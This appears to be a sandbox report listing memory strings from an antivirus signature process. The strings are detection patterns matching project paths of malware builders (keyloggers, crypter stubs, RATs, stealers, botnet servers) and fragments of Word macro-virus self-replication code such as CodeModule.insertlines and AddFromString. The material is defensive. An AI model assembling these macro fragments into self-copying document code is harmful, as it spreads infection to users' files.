Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .+\\Cryptosy\\Stub\\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: .+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: D:\\.+\\.+fcx\\.+1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: J*\AD:\Master\ADWARA_NEW\bho\VBBHO.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: JE.+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 2sharK\Server\Projekt1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: HMDCorP.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: ^Systema So as ipanema tem\INSTALL\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: J\MSLoad.VB.Keylogger.Project\DOWN.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: = NormalTemplate.VBProject.VBComponents(1).CodeModule
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: :\\Jhocko\\Loader\\Loader.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: .+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: ^\ie.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: .+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: D:\\Setup\\Drivers\\Audio\\Installs_the_RealTek_AC_97_audio_driver\\WDM5630\\Documents\\Documents11\\Secret\\Basic\\Updated\\Dao chich\\final 007 spy\\.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: =8.+\\invasao\\aaaa_kit_trix\\NOVENBRO novo KIT GF.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)]
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: \TIOCARADEPENE\Proyecto1.vbp]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: .+:\\Apub\\Cyfjrvepg.vbp
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: lgC:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: &Desktop\ery\ery.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: 50.+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: bradesco.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: +&.+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: Safety.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: .+\\invasao\\aaaa_kit_trix\\NOVENBRO novo KIT GF.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: 3.D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: ;6.+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: ~A*\AE:\ExeNew\ExeSyVbNew3\ExeSyVb\ExeClientOld360\ExeClient.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: 1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: (\LOADER\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: .+\\TUDO\\ARQUIVOS-NOVOS\\Downloader_pak.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: \Sp-Binder\Extracter\SpBinderExtracter.vbp]
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: .+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: H\EOF\Alfredo\Downloader\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: .+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: '".+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: :5.+:\\.+\\Cactilio - Joiner.+\\Src\\Stub\\YvcGVCI.vbp
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1,
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.sln.\|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .\LoardR0x\System NT.vbp
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: J@*\AE:\RE9FA3~1\BUG_1_~1\XXXXXX~1.VBP
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: .)C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: 6:\VB\own\ZB\ss\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: F:\prog lang\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Documents and Settings\HailuYa.ETHAIR\Desktop\pass\asterie.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: Virus\lsass.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: UPD:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: C:\\.A.\\B\\Base.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: :5C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	Binary or memory string: sload.vbp
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: %.com\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: \triploader.vbpP
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: :\PassStealer 3.0\Projekt1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: bTOYANO\otros virusillos\shell32\devil shell32.vbp
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: RMC:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	Binary or memory string: @.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: E:\\.+\\2010\\baidu.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: C:\winapp.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 2\folder_x\File Folder.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: 4/.+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: \ardCo011064.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: \WinSysFix_1.5.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: .+:\\.*XXSourceXX\\PrjMain.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: Z:\vir\vrz\vrz\screencapture\screenCpature.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: *z:\ultimate\casa.vbp]
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: \WebNav.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: :\\.+\\Indetectables RAT.+p.+is.+\\SIN WINSOCK\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: .+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: B=.+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: PharOlniNe\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: rypter\stub.vbp]
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: F*\AE:\sharK\2.2\Server\Projekt1.vbpd[
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: PD:\Master\bb_soft\bb_loader\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: ,Neriopert\Kolidert.vbp]
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: \Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\User\\Desktop\\.pia de.fab\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: :\Users\jpvic\Desktop\VB6DLL\PROFULL_NODLL_SPLIT_AND_RES\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: \Users\Jatz0r\Desktop\jajajaja\anarko\DRONES 3.0.b\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: vbSendMail.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: SN.+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: '"\\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: \W.+:\\Intel\\Obfuscated Number-[0-9]{1,3}\\Obfuscated Nr-[0-9]{1,3}\\[a-zA-Z]{5,15}.vbp
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: B=.+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: KeyBoardSpy.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: 50.+\\TUDO\\ARQUIVOS-NOVOS\\Downloader_pak.+\.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: .@*\AG:\NEW\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: \Program Files\Microsoft Visual Studio\VB98\VB Projects\Viruses\HDKP4\HDKP_4.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: D:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: ?:.+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: B=C:\\Users\\.\\Desktop\\.\\Lite-Stub\\Obfuscated .\\..vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \loaderFirefox.vbp
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: .v2\Pagina\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: Lkey logger project\logger\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: \ad.vbp
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: .vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: B=:\\.+\\Indetectables RAT.+p.+is.+\\SIN WINSOCK\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: MH.+:\\Documents and Settings\\User\\Desktop\\.pia de.fab\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: B*\AF:\learn\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	Binary or memory string: HKnamemom.vbpa
